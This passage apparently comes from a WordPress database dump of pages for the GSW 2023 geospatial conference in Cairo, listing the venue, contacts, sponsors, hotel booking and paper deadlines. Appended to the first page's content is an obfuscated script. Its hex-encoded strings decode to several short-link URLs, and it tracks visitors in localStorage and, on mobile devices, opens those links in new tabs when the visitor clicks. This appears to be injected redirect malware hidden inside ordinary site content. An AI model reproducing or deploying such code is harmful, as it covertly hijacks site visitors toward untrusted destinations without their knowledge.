css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 06:06:01','2023-05-17 06:06:01','',3066,'https://gsw2023.com/?p=4541',0,'revision','',0),
(4542,1,'2023-05-17 06:26:14','2023-05-17 06:26:14','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #f7f763;\"><strong><span style=\"font-size: 24pt;\">BOOK YOUR HOTEL NOW</span></strong></span></h4>\n<h4></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">(InterContinental Cairo Semiramis)</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684303522001{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px 